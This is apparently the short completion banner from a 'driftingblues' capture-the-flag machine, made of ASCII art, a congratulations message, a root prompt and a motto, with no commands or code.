░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
congratulations!
firefart@driftingblues:~#
STRIVE FOR PROGRESS,NOT FOR PERFECTION
